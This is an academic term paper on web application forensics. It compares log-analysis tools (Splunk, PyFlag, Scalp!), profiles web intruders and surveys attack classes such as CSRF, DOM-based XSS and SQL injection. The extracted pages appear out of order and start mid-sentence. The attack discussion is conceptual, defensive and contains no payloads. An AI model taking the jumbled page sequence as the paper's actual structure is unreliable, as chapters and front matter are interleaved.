forensic jobs, which could then be exploited straight away.


Splunk


This tool is developed and maintained by Splunk Inc.32. Its current stable release is 4.2.2, 2011.
Although the professional version of the tool is highly priced, there is a test version limited to
30 days and to a bounded amount of parsed log data of up to 500 MB. The test version can be
employed for free. Furthermore, there is community support for Splunk in the form of a mailing list
and a community wiki hosted on the Splunk Inc. domain. Official support regarding Splunk
documentation, version releases and FAQ/case studies is presented at the tool's website, which
requires a free registration.
Another advantage of Splunk is the on-the-fly official/community IRC support. A further interesting
feature are the video tutorials uploaded by users and official professionals, demonstrating specific
usage scenarios and case studies.
The tool has wide OS support: Windows, Linux, Solaris, Mac OS, FreeBSD, AIX and HP-UX.
Splunk can be considered a highly hardware-consuming application33. It was tested on an Intel
Pentium T7700 machine with 3 GB of RAM under Windows XP Professional SP3 and Ubuntu
Linux 10.04 Lucid Lynx. In both cases the setup ran flawlessly with little additional installation
effort on the user's side. After successful installation Splunk registers a new user on the host OS,
which can be deactivated. The tool is a Python based application. It sets up a Web server, an
OpenSSL server and an OpenLDAP server, which interact with the different parsers for input data.
The configuration of the different Splunk elements is implemented via XML, which allows them to
be adjusted in a user-friendly way. Splunk has even greater input format support than MS
LogParser, which designates the tool as not only OS independent, but also an input format all-
rounder. An interesting combination of Splunk with Nagios is discussed in [L18]. A screenshot of
the officially advertised features of the tool is shown in Appendix B, Figure 21. These aspects relate
to TRR 1, 2, 3, 4, 5. TRR 7, 9 and 10 should be tested more extensively in particular.
The user interacts with Splunk via a common Web browser. The different Splunk elements are
organized on a dashboard, which can be reordered and arranged in a user-friendly manner.
Let us describe the main Splunk units in more detail. Their description is based on [L19], which
concerns Splunk version 3.2.6. Although Splunk was completely rewritten after version 4.0, the
main business logic units remain.
In general, the idea behind this tool is not only to parse different log file formats and support
different network protocols, but also to index the parsed data. Thus, the tool acts as a valuable
search engine, like those largely known nowadays on the Internet. This allows the user to
accomplish more user-friendly and precise searches on specific criteria. Indeed, the query responses
from the tail dashboard are remarkably fast.
32 http://www.splunk.com/
33 http://www.splunk.com/base/Documentation/latest/installation/SystemRequirements


Intuitively, we designate the first Splunk unit as the index engine. It supports SNMP and syslog as
well. Consequently, the second unit is the search core engine. One can combine different search
operators on specific criteria, like Boolean, nested, quoted and wildcard operators, which respects,
as already stated, TRR 5 and 7. The third unit is the alert engine, which to some extent satisfies
TRR 9. The notifications can be sent via RSS, e-mail, SNMP, or even particular Web hyperlinks. In
addition, the fourth unit implements the reporting ability of Splunk, TRR 2 and 3. On a specially
prepared dashboard the user/forensic examiner can not only obtain detailed results on the parsed
payload in text format, but also gain derived information as interactive charts and graphs, and
specifically formatted tables according to the auditing jobs. These are well illustrated in Appendix
B, Figure 22. An interesting example describes the reporting ability of Splunk to detect JavaScript
onerror entries by means of a user-developed JSON script, see [L22].
The fifth and last unit represents the sharing engine/feature of Splunk. It reflects the strive for users'
collaborative work with this tool, whereby know-how exchange is encouraged. Another motivation
for this unit is a distributed Splunk environment, where not only a single instance of Splunk is
serving the specific network. Further abilities of the forensic tool should be mentioned: scaling with
the observed network and securing the parsed data.
This last feature deserves a more detailed discussion. An open question remains, as noted for MS
LogParser, whether the tool itself is hardened enough, considering the fact that the large payload
data is not only indexed, but also represented in a user-friendly way. As Splunk is without a doubt
an interface to every log file and protocol on the observed network, this binding point is a likely
target for compromise. If an attacker succeeds in this matter, he gets every detail related to the
observed network represented in a user-friendly format, which relieves the intruder of collecting
valuable payload data and minimizes his/her penetration efforts. As the Splunk front-end is rendered
in a Web browser, the reader can intuitively notice that CSRF [4] and CSFU [L20] are respectable
candidates for such attacking scenarios, especially combined with DOM based XSS attacks [20],
[L21], which can trigger the malicious events in the browser engine. If such scenarios can be
achieved, then Splunk can turn into a favourite jump-start platform for exploiting secured networks,
instead of being utilized as an appropriate forensic investigation tool. This designates an essential
aspect concerning the future work on WAFO. We do not extend this discussion further, as it goes
beyond the boundaries of the present paper.
Let us introduce the selected Open Source WAFO tools, as mentioned above.

4.3. Open Source tools

Let us first describe PyFlag.


PyFlag


As with the previously described tool, there is a team behind the PyFlag development: Dr. Michael
Cohen, David Collett and Gavin Jackson. The tool's name is an abbreviation of: Python based
Forensic and Log Analysis GUI. PyFlag is another Python implementation of a forensic
investigation tool, which uses the common Web browser as a front-end for the user.



The current version of the tool is pyflag-0.87-pre1, 2008. The tool is hosted at SourceForge34 and,
as an Open Source application, can be obtained for free under the GPL. The support site is
www.pyflag.net. This domain also hosts the PyFlag Wiki with presentations of the tool and video
tutorials. A further advantage is a predefined forensic image for examination, also hosted on the
support site; this image can be employed for training purposes in forensic investigation.
The general structure of the tool can be described as follows. The Python application sets up a Web
server for displaying the parsing output; furthermore, the collected input data is stored in a MySQL
server, which allows the tool to operate with a large amount of log file lines, respecting TRR 4. The
IO Source engine designates the interface to the forensic images, which enables the tool to operate
with large-scale input file types, like Splunk. Once the observed image is loaded by the Loader
engine into the Virtual File System, different scanners can be utilized for gaining the forensically
relevant payload from the raw data. For the reader concerned, please refer to [L26]. The main
PyFlag data flow is illustrated in the next Figure 15:




Figure 15: Main PyFlag data flow, as [L26]

PyFlag is natively written to support Unix-like OSes. A Windows based port, PyFlagWindows35, is
currently presented on the support Web site. This makes the tool OS independent as well. The
PyFlag developers state that the tool is not only a forensic investigation tool, but rather a rich
development framework. The tool can be used in two modes: either as a Python shell, called
PyFlash, or via a user-friendly Web GUI. The installation process requires some user input; more
precisely, common installation routines are demanded, like unpacking the archive to a destination
on the host OS, configuring the source via ./configure on Linux systems, checking for dependency
issues and running make install.
The first start of the tool requires the forensic investigator to configure the MySQL administrative
account and the Upload directory. This location is crucial for the forensic images which are to be
observed. In general, PyFlag represents a Web Application forensic tool (log files), a Network
forensic tool (capture images via pcap) and an OS forensic investigation tool. As denoted in the
introduction of the paper, we concentrate only on the log file analysis by PyFlag, leaving aside its
other features concerning NFO and OSFO (Operating System Forensics).
The authors of the tool encourage forensic investigators to correlate the different evidence from
WAFO, NFO and OSFO, as was already proposed before.

34 http://sourceforge.net/
35 http://www.pyflag.net/cgi-bin/moin.cgi/PyFlagWindows


In more detail, PyFlag supports a variety of different and independent input file formats like the IIS
log format, Apache log files, iptables and syslog formats, respecting TRR 1, 2 and 3. The tool also
supports different levels of format customization, e.g. Apache logs can be parsed with the default
format, or with one customized by the security professional.
Let us explain this. After the installation is completely set up, the user can work with the browser
GUI PyFlag environment. For analyzing a specific log file, PyFlag provides presets, which are
templates allowing a collection of log files of a specific class, e.g. the IIS log file format, to be
parsed. The preset selects the driver for parsing the specific log as appropriate. A standard routine
for setting up an IIS log file analysis is described in [22], as follows:
    •   Select “create Log Preset” from the PyFlag “Log Analysis”- Menu
    •   Select the “pyflag_iis_standard_log” file to test the preset against
    •   Select “IIS” as the log driver and utilize the parsing
A more extensive introduction to the WAFO utilization of the tool was presented at Linux.conf.au,
2008; please consider watching the presentation video [L23]. After the tool starts to collect payload
data from the input source, the forensic investigator can either employ pre-defined queries and thus
minimize the parsing time on the fly, or wait for the complete data collection. The data noise in the
obtained collection can also be reduced via white-listing, as in TRR 7. Moreover, after the data is
collected, the examiner can apply index searching via natural-language-like queries, comparable to
Splunk. These features explain the efficient searching in PyFlag. Another interesting aspect of the
tool is the integration of GeoIP36 (Apache). It can either be obtained from the Debian repository,
which provides a smaller GeoIP collection, or downloaded from the GeoIP website as a complete
collection. GeoIP allows the IPs and timestamps to be parsed and correlated to the origin location
of the GET/POST requests in the log file. This respects TRR 3.
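
As a minimal sketch of this kind of correlation (PyFlag itself relies on the Apache GeoIP module;
the pygeoip library, the database path and the sample addresses below are assumptions used only to
illustrate the idea):

import pygeoip  # pure-Python reader for the legacy GeoIP.dat databases

geo = pygeoip.GeoIP("GeoIP.dat")  # path to the downloaded country database (assumption)

def origin_of(ip_address):
    """Return the country code the IP resolves to, or None if unknown."""
    return geo.country_code_by_addr(ip_address) or None

# hypothetical client IPs taken from GET/POST entries of a Web server log
for ip in ("198.51.100.23", "203.0.113.42"):
    print(ip, origin_of(ip))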
The tool can also store the collected evidence payload in output formats like .csv, which explains
its utilization as a front-end to other tools applied in the investigation. An illustration of the PyFlag
Web GUI is given in Appendix B, Figure 23. To conclude the tool's description, we should mention
once more the open question of a possible compromise of the Web GUI, as explained for Splunk.
A well-known attack concerning HTTP Pollution on ModSecurity37 was presented by Luca
Carettoni38 in 2009, where the IDS is exploited by an XSS instead of utilizing an image upload to
the system. As mentioned above, this supports the argument that the tool should be revised for such
kinds of exploits and especially rechecked for possible DOM based XSS exploits concerning its
own source.


Apache-scalp or Scalp!


This tool should be considered an explicit WAFO investigation tool. Scalp! is developed by
Romain Gaucher and the project is hosted on code.google.com. Its current version is 0.4 rev. 28,
2008. The tool is the only one of those described above which explicitly deploys RegExes. It is a
Python script which can be run in the Python console on the common OSes, which makes it OS
independent. The tool is published under the Apache License 2.0 and is designed specifically for
parsing Apache log files, which restricts its usability to this class of log files and does not respect
TRR 1 and 2. It has been tested only on log files of a couple of MiB, which further disrespects

36 http://www.maxmind.com/app/mod_geoip
37 http://www.modsecurity.org/
38 http://www.linkedin.com/in/lucacarettoni

42 WAFO victim environment preparedness ...................................................................................... 44 Appendix B .................................................................................................................................... 45 Proprietary WAFO tools ................................................................................................................ 45 Open Source WAFO tools ............................................................................................................. 48 Results of the tool's comparison .................................................................................................... 49 List of links .................................................................................................................................... 50 Bibliography .................................................................................................................................. 52 2
  • 3. List of Figures Figure 1: General Digital Forensics Classification, WAFO allocation ............................................. 8 Figure 2: Web attacking scenario taxonomic construction .............................................................. 15 Figure 3: Digital Forensics: General taxonomy .............................................................................. 20 Figure 4: WAFO phases, in Jess Garcia[1] ...................................................................................... 21 Figure 5: Extraneous White Space on Request Line, in [3] ............................................................ 23 Figure 6: Google Dorks example, in [3] .......................................................................................... 24 Figure 7: Malicious queries at Google search by spammers, in [3] ................................................ 24 Figure 8: faked Referrer URL by spammers, in [3] ......................................................................... 24 Figure 9: RFI, pulling c99 shell, in [3] ............................................................................................ 24 Figure 10: Simple Classic SQLIA, in [3] ........................................................................................ 25 Figure 11: NBO evidence in Webapp log, in [3] ............................................................................. 25 Figure 12: HTML representation of spam-mail( e-mail spoofing) .................................................. 26 Figure 13: e-mail header snippet of the spam-mail in Figure 12 .................................................... 26 Figure 14: Spam-assassin sanitized malicious HTML redirection, from example Figure 12 ......... 27 Figure 15: Main PyFlag data flow, as [L26] .................................................................................... 35 Figure 16: Improving the Testing process of Web Application Scanners, Rafal Los [10] .............. 43 Figure 17: Flow based Threat Analysis, Example, Rafal Los [10] .................................................. 43 Figure 18: Forensics Readiness, in Jess Garcia [13] ....................................................................... 44 Figure 19: MS LogParser general flow, as [L16] ............................................................................ 45 Figure 20: LogParser-scripting example, as [L17] .......................................................................... 45 Figure 21: Splunk licenses' features ................................................................................................ 46 Figure 22: Splunk, Windows Management Instrumentation and MSA( ISA) queries, at WWW .. 47 Figure 23: PyFlag- load preset and log file output, at WWW ......................................................... 48 Figure 24: apache-scalp or Scalp! log file output( XSS query), as [L25] ....................................... 48 List of Tables Table 1: Abbreviations ....................................................................................................................... 4 Table 2: A proposal for general taxonomic approach, considering the complete WAFO description ... 11 Table 3: Example of possible Webapp attacking scenario ............................................................... 16 Table 4: Standard vs. Intelligent Web intruder ................................................................................ 
17 Table 5: Web Application Forensics Overview, in [15] ................................................................... 21 Table 6: A general Taxonomy of the Forensics evidence, in [1] ..................................................... 22 Table 7: Common Players in Layer 7 Communication, in Jess Garcia [1] ..................................... 22 Table 8: Traditional vs. Reactive forensics Approaches, in [13] ..................................................... 29 Table 9: Functional vs. Security testing, Rafal Los [10] ................................................................. 42 Table 10: Standards & Specifications of EFBs, Rafal Los [10] ...................................................... 42 Table 11: Basic EFD Concepts [10] ................................................................................................ 42 Table 12: Definition of Execution Flow Action and Action Types, Rafal Los [10] ........................ 42 Table 13: TRR completion on LogParser, Splunk, PyFlag, Scalp! ................................................. 49 Table 14: List of links ...................................................................................................................... 51 3
  • 4. Abbreviations
Anti-Virus - AV
Application-Flow Analysis - AFA
Business-to-Business - B2B
Cloud-computing - CC
Cloud(-computing) Forensics - CCFO
Digital Forensics - DFO
Digital Image Forensics - DIFO
Execution-Flow-Based approach - EFB
Incident Response - IR
Microsoft - MS
Network Forensics - NFO
Non-persistent XSS - NP-XSS
NULL-Byte-Injection - NBI
Operating System(s) - OS(es)
Operating System(s) forensics - OSFO
Persistent (stored) XSS - P-XSS
Proof of Concept - PoC
Regular Expression - RegEx
Relational Database System - RDBMS
Remote File Inclusion - RFI
SQL Injection Attacks - SQLIA
Tool's requirements rules - TRR
Web Application Firewall(s) - WAF(s)
Web Application Forensics - WAFO
Web Application Scanner - WAS
Web Attacking Scenario(s) - WASC
Web Services Forensics - WSFO
Table 1: Abbreviations 4
  • 5. Abstract The topic of Web Application Forensics is a challenging one. There are few references discussing this subject, especially in the scientific communities. The term 'Web Application Forensics' is often misunderstood and confused with IDS/IPS defensive security approaches. Another issue is to distinguish Web Application Forensics, short Webapp Forensics, from Network Forensics and Web Services Forensics, and in general to allocate it within the Digital/Computer Forensics classification. Web platforms are growing rapidly nowadays, not to mention the so-called Web 2.0 hype. Furthermore, business Web applications outgrow the common security knowledge and demand a rapid inventory of the current security best practices and approaches. The questions concerning the automation of defensive and investigative security methods are becoming undeniably important. In this paper we address the questions concerning taxonomic approaches to Webapp Forensics, discuss trends related to this topic, and debate the matter of automation tools for Webapp forensics. Keywords Web Application Security, WebMail Security, Web Application Forensics, WebMail Forensics, Header Inspection, Plan Cache Inspection, Forensic Tools, Forensics Taxonomy, Forensics Trends 5
  • 6. 1.Introduction 1. Introduction In [1], Jess Garcia gives a definition of the term 'Forensics Readiness': “Forensics Readiness is the “art” of Maximizing an Environment's Ability to collect Credible Digital Evidence”. We should keep this statement in mind throughout the rest of the paper, as it points out several important aspects. Foremost, forensics relies on a maximal collection of digital evidence. If the observed environment1 is not well prepared for a forensic investigation, discovering the root cause of how the system has been attacked can become laborious, inefficient in time and even non-deterministic, so that an appropriate remediation of the problem may never be found. Another essential aspect of forensics, as Jess Garcia puts it, is that the forensic investigation is an art. It follows that defining rigid best practices for the proper deployment of forensic work is of limited value: an intelligent intruder will always find drawbacks in such best-practice scenarios and try to exploit them, in order to accomplish new attacks, complete them successfully and remain concealed. This raises the question of how we can suggest a taxonomy of forensic work if we are aware a priori of the risks such recipes include. We shall propose several general intruder strategies and a profiling of the modern Web attacker in this paper, taking care not to harm the universal validity of the statements we discuss. In some cases we give examples and paradigms through references, though only to illustrate the statements of the current thesis. Let us describe the matters concerning Webapp Forensics more precisely in the next section. 1.1. What is Web Application Forensics? Web Application Forensics (WAFO) is a post mortem investigation of a compromised Web Application (Webapp) system. WAFO considers in particular attacks on Layer 7 of the ISO/OSI model. In contrast, capturing and filtering internet protocols on-the-fly is not a concern of Webapp forensics; such issues are, in general, the focus of Network Forensics (NFO). Nevertheless, examining the log files of such automated tools (IDS/IPS/traffic filters/WAF etc.) supports the correct deployment of the Webapp forensic investigation. As stated above, NFO examines such issues in detail, which is why we discern Webapp Forensics from it, while keeping in mind the supportive function that Network forensic tools can supply to WAFO. Consequently, we should explicitly allocate WAFO within the Digital Forensics (DFO) structure, because some main topics of DFO are not implicitly related to Layer 7 of the ISO/OSI model. These include: memory investigations, Operating Systems forensics investigations, secure data recovery on the physical storage of OSes, etc. Nevertheless, DFO also considers investigations of image manipulations [L1], [L2], which in some cases can be very supportive for the proper deployment of WAFO. Finally, we categorize WAFO as a sub-class of Cloud Forensics (CCFO) [2]. Cloud 1 we assume that the reader understands the abstraction of the Webapp as a WAFO environment 7
  • 7. 1.Introduction Forensics is a relatively new term in the Security communities. Historically, the existence of Web Applications lead in phase to the Cloud-Computing( CC). Concerning the complexity of the Web applications, platforms and services presented by the CC, CCFO cover larger investigation areas than the WAFO. As an example, WAFO is not explicitly observing fraud on Web Services. Web Services are covered by the Web Services Forensics( WSFO), another sub-class of CCFO, and should be categorical discerned from WAFO, please read further. Let us illustrate the DFO taxonomic structure in the next Figure: Figure 1: General Digital Forensics Classification, WAFO allocation On behalf of this short introduction of the different Computer Forensics categories, let's designate explicitly the limitations of the paper. This concerns the better understanding of the paper's exposition and explain the absence of examples, covering different exotic attacking scenarios. 1.2. Limitations of this paper This term paper discusses Web Application Forensics, which excludes topics as on-the-fly packet capturing, packet inspection of sensitive data over ( security) internet protocols. Once again to mention, it does not cover attacks, or attacking scenarios on lower layer than Layer 7 ISO/ OSI Model. For the interested reader, a very good correlation of the Layer 7 Attacks and below, concerning Web Application Security and Forensics can be found at [3]. In distinction to Web Services Forensics [5] and CCFO [2], the presented paper covers only a small topic, concerning the varieties of fraud Web Applications: • RIA( AJAX, RoR2, Flash, Silverlight et al.) , 2 RoR- Ruby on Rails, http://rubyonrails.org/ 8
  • 8. 1.Introduction • static Web Applications, • dynamic Web Applications and Web Content( .asp(x), .php, .do etc. ), • other Web Implementations( like different CMSes), excluding research on fraud, concerning Web Services Security, or CC Implementations, but explicitly Web Applications. Due to the marginal limitations of the term paper, the reader shall find a couple of illustrating examples, which do not pretend to cover the variety of illustrative scenarios of Web Attacking Techniques and Web Application Forensics approaches. For the reader concerned, attacks on Layer 7 are introduced and some of them discussed in detail at [4]. Furthermore, we should denote a clarification, regarding the references in this paper, considering their proper uniformity, as follows. General knowledge should be referenced by footnotes at the appropriate position. The scientifically approved works are indexed at the end of the paper in the Bibliography, as ordinary. Non scientifically approved works, also video-tutorials, live video snapshots of conferences, blogs etc. are indexed by the List of links after the Appendix of this paper. We should imply this strict references' sources division, with respect to the Security Scientific Communities. In addition to this, let us introduce some of the interesting related works dedicated on the topic of WAFO. 1.3. Reference works An extensive approach, covering the different aspects of Web Application Forensics, is given in the book “Detecting Malice” [3], by Robert Hansen3. The interested reader can find much more than just WAFO discussions in this book, but in addition to these also examples of attacks on lower level than Layer 7, correlated to the WAFO investigations and many paradigms, derived from real-life WAFO investigations. The unprepared reader should notice that, the topics in the book, discussing WAFO tools, are limited. The author of the book points out the sentence, that every WAFO investigation should be considered as unique, especially in its tactical accomplishment, therefore favoring of top automated tools, should be assumed as inappropriate, please read further. Another interesting approach is given by SANS Institute as Practical Assignment, covering three notable topics: penetration testing of a compromised Linux System, a post mortem WAFO on the observed environment and discussions on the legal aspects of the Forensics investigation [6]. Despite the fact that, this tutorial in its Version 1.4 is no more relying on an up-to-date example, it illustrates very important basics, concerning WAFO and can be used still as a fundamental reading for further research on the WAFO topic. BSI4, Germany, describes in the Section, Forensic Toolkits, at “Leitfaden “IT-Forensik” [7], Version 1.0, September 2010, different Forensic tools for automated analysis, many of them concerning implicitly WAFO. The toolkits are compared by the following aspects: • analyzing of log-data, 3 http://www.sectheory.com/bio.htm 4 https://www.bsi.bund.de/EN/Home/home_node.html 9
  • 9. 1.Introduction • tests, concerning time consistency, • tests, concerning syntax consistency, • tests, concerning semantic consistency, • log-data reduction, • log-data correlation, concerning integration and combining of different log-data sources in a consistent timeline, integration/ combining of events to super-events, • detection of timing correlations( MAC timings) between events. The given approaches can be related to WAFO log file analysis, which designates them as reasonable supportive WAFO investigation methods. Another tutorial, giving basic overview, which should be also considered as fundamental regarding WAFO research, is: “Web Application Forensics: The Uncharted Territory”, presented at [8]. Although, the paper is published in 2002, it should not be categorized it in a speedy manner as obsolete. Other papers, articles and presentation papers, concerning specific WAFO aspects, complete the group of the related references, concerning the Web Application Forensics research in this term paper. These should be referenced at the appropriate paragraphs in the paper's exposition and not be discussed individually in this section, furthermore. Let's describe the structure of the term paper. Chapter 2 should give a taxonomic illustration on the topics, designating intruders' profiling and modern Web Attacking Scenarios. Chapter 3 deliberates WAFO investigation methods and techniques more detailed and concerns further discussion on the matter of signification of a possible WAFO taxonomy. In Chapter 4 are illustrated the WAFO investigation supportive tools. An important section outlines the questions, concerning the requirements of WAFO toolkits, which points out the reasonable aspects for determining the tools either as relevant, or inappropriate for adequate WAFO investigations. Two major group of favorite tools should be designated: Proprietary Toolkits and Open Source solutions. Chapter 5 represents the final discussion on the paper's thesis and suggestions for future work on behalf of the discussed topics in the former chapters. In Chapter 6 is deliberated the Conclusion on the proposed thesis. The Appendix demonstrates an additional information( tables, diagrams, screenshots and code snippets) on specific topics, discussed in the exposition part of the paper. Let us proceed with the description of the Web Attacking Scenarios and ( Web) Intruder profiles. 10
  • 10. 2.Intruder profiles and Web Attacking Scenarios 2. Intruder profiles and Web Attacking Scenarios The introduction of this thesis outlined that the scientifically approved research on Web Application Forensics by the security and scientific communities must still be considered insufficient and not well-established. For this reason, an appropriate categorization of the different forensic fields and the correct allocation of WAFO in the Digital Forensics hierarchy were identified as necessary in the former chapter, which satisfies one of the objectives of the current paper. Even so, this classification does not present a complete fundamental basis for further academic research on WAFO. Therefore, we extend the abstract model of WAFO by introducing two further fundamentals: the profile of the modern Web intruder, and the methodologies (abstract schemata) by which current cyber (Web) attacks are accomplished. Thus, we follow the schema proposed in the following Table for describing the aspects of WAFO completely:
1. represent the Digital Forensics hierarchy and
2. allocate the field of interest, concerning WAFO,
3. explain the Security Model WAFO observes, by: • designating the intruder, • describing the victim environment (Webapps), • specifying the fraudulent methods;
4. demonstrate the WAFO tasks, supporting the security remediation plan
Table 2: A proposal for a general taxonomic approach, considering the complete WAFO description
Along these lines, we should stress that intruders' attacks on existing Web Applications and other Web implementations nowadays have to be regarded as highly sophisticated. Such Web attacks adapt rapidly in their variations and alternations, and in some cases they are precarious to sanitize effectively. Examples of such attacks, like CSRF, compounded SQLIA and compounded CSRF, are described in [4]. A good representative of this group is the famous Samy worm, which is still wrongly considered to be a pure XSS attack. Another confusing example is the third wave of XSS attacks, DOM-based XSS (DOMXSS) [20]. It is an ominous fact that DOMXSS attacks cannot be detected by IDS/IPS or WAF systems when the payload is hidden in a URL parameter, since the Web Application server does not record such parameters in the log file, but only the primary URL prefix. If the nature of such attacking scenarios is fundamentally misunderstood, it is only a matter of time before derivatives of these attacks succeed in further fraudulent activities on the Web. The task of sanitizing a Web application compromised by CSRF is very difficult. It requires immense Reverse Engineering and source-code rectification effort within reasonable boundaries of time and efficiency. The more general problem is that Web Applications are per se not stealthy5. Thus, hardening a 5 Exceptions to these could be Intranet-Webapps, which designate another class of Webapps, concerning the term 11
  • 11. 2.Intruder profiles and Web Attacking Scenarios Webapp is not equivalent to hardening a local host. In other words, the utilization of known preventive techniques, like security-through-obscurity, can be applied to secured Intranet Web applications, admin Web interfaces, non-public FTP servers etc., but not to commercial B2B Webapps, on-line banking, social network Web sites, on-line magazines, WebMail applications and others. These last-mentioned applications are, by definition, meant to be used from all over the world; they exist precisely because of the huge number of their users and customers. That is why securing such Web constructs is more complex and intensive. Of course, there are basic and advanced authentication techniques applied to Web implementations, though these do not make the Webapp stealthy for intruders; they merely restrict which users may reach the sensitive parts of the Web implementation. In this line of thought, pointing out extreme cases of Web fraud like child pornography and attacks on personal reputation is only the tip of the iceberg of Web crime. The problem is that identity theft and speculation with sensitive personal data can no longer be categorized as exotic examples of existing cyber crimes6 on Web platforms; such crimes are an everyday occurrence. Social networks, social and health insurance companies strive for an ever more impressive Web presence, and e-commerce platforms for daily monetary transactions are indispensable nowadays. We should no longer treat Web 2.0 as a hype; we should keep in mind that the former dynamic e-commerce Web representations have turned into sophisticated RIA Web platforms. Such Webapps serve the better marketing representation of the firms' Business Logic, whose profit nowadays depends on complexity, rapidly changing dynamic adaptation and ever more user-friendly features for satisfying the Web customer at any time. These aspects explain the intruders' huge interest in compromising Web applications, and furthermore Web Services as well. There are no deterministic conclusions on the prediction of Web Attacking Scenarios, or on the amount of damage they cause every day. In [3], Robert Hansen compares the intensity of Web attacks and the amount of damage they cause to that of computer viruses. Neither of these security topics should lose the attention of the security communities for a long period of time. Moreover, as already stated, their remediation cannot be ascertained straightforwardly. As we know, there is no default approach for proper sanitization against computer viruses; the same statement applies to Webapp attacking scenarios. Rather, it is a matter of extensive 24/7/365 deployment of proper security hardening techniques and strategies, and of their adaptive improvement. Knowing your friends is good, knowing your enemies is crucial. Having given this conclusive explanation of the paper's motivation, let us proceed with the representation of modern Web fraud in detail. 2.1. Intruder profiling Two general categories should be designated in this section: the standard intruder profile and the profile of the intelligent intruder who performs serious cyber crime, short: the intelligent intruder profile.
The use of the adjective 'intelligent' for the second intruder profile is well justified, in view of the following fact: if we, as representatives of the security communities, claim to possess the knowledge and know-how required for the proper performance of our duties, this kind of intruder possesses it too, and much more. paper's definitions, where extensive intruder's effort is a pre-requirement for breaking the Intranet security, and which should not be discussed here as relevant. 6 http://www.justice.gov/criminal/cybercrime/ 12
  • 12. 2.Intruder profiles and Web Attacking Scenarios There are also fuzzy definitions of intruders, which designate states in between the above mentioned ones. In fact, these profiles are very agile in their representation. For example- a 'former' intelligent intruder should be categorized better as a latent one, and a motivated standard attacker should not be disrespected. This violator could fulfill the requirements of the category, related to the intelligent intruder profile, at any time with sufficient likelihood. In the category of standard intruder we should determine: script kiddies and hacker wannabes, “fans” of YouTube, or other video platforms, capturing knowledge and know-how from easy how-to video tutorials. Bad configured robots and spiders, and any other kind of not well educated, not enough motivated, even not enough skilled daily violators. Specific for this group of intruders is the lack of personal knowledge and know-how, utilization of well known attacking techniques and scenarios well-established on the Web. Such violators are ignorant to and disrespecting the noise7 they produce, while trying to accomplish the attacks. These features explain the deduction- a standard attacking scenario, could be sanitized in greater likelihood with standard prevention and hardening techniques( best-practices). In cases of successfully deployed attack(s) on behalf of such standard scenarios, the investigation and detection approaches could be considered as standard with greater likelihood too. For all that, there are cases, which represent attacking scenarios, designated as shadow scenarios. It is not important, whether these are accomplished successfully, or not at the specific time of the attack's deployment. Their utilization is to cover the deployment of the real attacking scenario. That's why, we should rather concern, whether these are cases of intelligent intruders' attacks. The group of intelligent intruders should deliberate: 'former' ethical hackers; pen testers; security professionals, who have changed sides, disrespecting their duties; intelligently set up automated tools for Web Intrusion, such as Web Scanners, Web Crawlers, Robots, Spiders etc. The most notable feature describing these representatives is the possession of inferior independent knowledge and know-how. Furthermore, patience, accuracy in the accomplishment of the attacking scenario deployment, strive to learn and assimilate new know-how. Interesting examples, related to this profile, are given at [3]. We should mention some types of such ones. Intelligent hackers are recruited by law firms to achieve a Proof of Concept( PoC) on a targeted Web implementation. If the PoC is positive, this could alter the outcome of the legal case, as this PoC could be used as decisive juristic evidence in most of the situations in account of the hacker recruiting law firm. Such intruders' attacks are difficult to be detected right on time. Furthermore, there are other cases, where the damage of the accomplished attack is the determinant alarm after havoc is consequently presented. As already stated, the sanitization of the compromised Web Application(s) after such successful attacks is in some cases unfeasible and more often requires sophisticated methods to be achieved. Examples of these are CSRF compromised Webapps, like the case: PDP GMail CSRF attack8, see also [4]. 
Therefore, the proper deployment of Web Application Forensics investigations provides reasonable support for the accurate sanitization of the compromised Webapp. Let us mention several examples of modern Web Attacking Scenarios in the next section of Chapter 2. 7 We should emphasize here the communication complexity and the number of false-positive attempts by the violator(s) in their strive to complete the intended Web attacking scenario(s); this should not be mistaken for the utilization of attacking techniques where producing communication noise is the core of the attacking strategy, like different DDoS implementations: Fast Fluxing SQLIA, DDoS via XSS, DDoS via XSS with CSRF etc. 8 http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/ 13
  • 13. 2.Intruder profiles and Web Attacking Scenarios 2.2. Current Web Attacking scenarios In May 2009, Joe McCray9 concluded in his presentation [9] on 'Advanced SQL Injection' at LayerOne10 that Classic SQLIA should no longer be categorized as a trend or as conventional. In [4], Classic SQLIA are still discussed as part of the current SQLIA taxonomy as of 2010. Despite that, their categorization by Joe McCray should be respected as reasonable. This controversial issue appears in many of the current Web attacking vectors: to achieve a complete taxonomic approach for a concrete Webapp attacking vector, many obsolete representations of the attacking sub-classes have to be illustrated, reflecting the real Web environment. The above-mentioned Classic SQLIA illustrate obsolete and, moreover, unfeasible attacking techniques, considering properly employed modern defensive methods. The main reason behind this issue is that Web platforms are changing rapidly, not only in their development aspects, but even more so in the attacking and security hardening scenarios applied to them. Most likely, an intelligent intruder will not use obsolete techniques, because of the expected presence of Web Application security protection. Detecting the deployment of obsolete attacking scenarios on a modern Web construct could be classified as an investigation of the standard intruder's profile. Nevertheless, this conclusion should not be underestimated, as previously discussed; see shadow scenarios. Let us give some interesting examples of recent, successfully accomplished Web attacks. In July 2009, a dynamic CSRF attack was accomplished on the Web platform of Newsweek [4], [L4]. The tool called MonkeyFist11, used for this first completely automated CSRF attack, is a small Python-based web server configured via XML. The victim site had already been hardened by protecting the generation of its dynamic elements with security tokens12 and strong session IDs. Nevertheless, this new attacking technique achieved positive results, which leaves open questions concerning the impact of the 'Sea Surf' sleeping giant. Another recent attack is the SQLIA against the British Navy website [L5] in November 2010, which was only meant as a PoC by a Romanian hacker that Web Application security can be broken even at such highly hardened Web implementations. In April 2011, a different mass infection by SQLIA was detected: about 28,000 Web sites were compromised, and even several Apple iTunes Store index sites were infected. The SQLIA injects a PHP script which redirects the user to a cross-origin phishing site pretending to deliver on-line Anti-Virus (AV) protection. The attack is known in the security communities as the LizaMoon mass SQLIA13 [L6]. The list of such impressive Web attacking incidents could be continued, but shall not be enumerated further in the paper. The interested reader should refer to: • The Web Hacking Incidents Database14 • OWASP Top Ten Project15 9 http://www.linkedin.com/in/joemccray 10 LayerOne- IT- Security conference, http://layerone.info 11 http://www.neohaxor.org/2009/08/12/monkeyfist-fu-the-intro/ 12 The anti-CSRF token is originally suggested by Thomas Schreiber, in 2004: www.securenet.de/papers/Session_Riding.pdf 13 http://blogs.mcafee.com/mcafee-labs/lizamoon-the-latest-sql-injection-attack 14 http://projects.webappsec.org/w/page/13246995/Web-Hacking-Incident-Database 15 http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project 14
